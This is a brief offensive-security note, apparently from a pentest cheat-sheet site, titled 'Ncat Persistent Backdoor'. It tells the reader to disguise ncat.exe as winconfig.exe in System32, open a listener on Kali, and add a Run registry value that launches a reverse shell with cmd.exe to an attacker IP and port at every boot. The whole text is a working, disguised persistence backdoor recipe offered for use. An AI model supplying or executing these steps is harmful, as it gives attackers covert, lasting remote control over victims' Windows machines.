Ncat Persistent Backdoor

On victim, rename ncat.exe to winconfig.exe and move it to C:\Windows\System32\winconfig.exe
On kali, set up a listener ncat -l -p 5544 -v
On windows > Run > regedit >Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run > New > String Value > winconfig > Value data: "C:\Windows\System32\winconfig.exe 192.168.102.145 5544 -e cmd.exe"

Last updated 4 years ago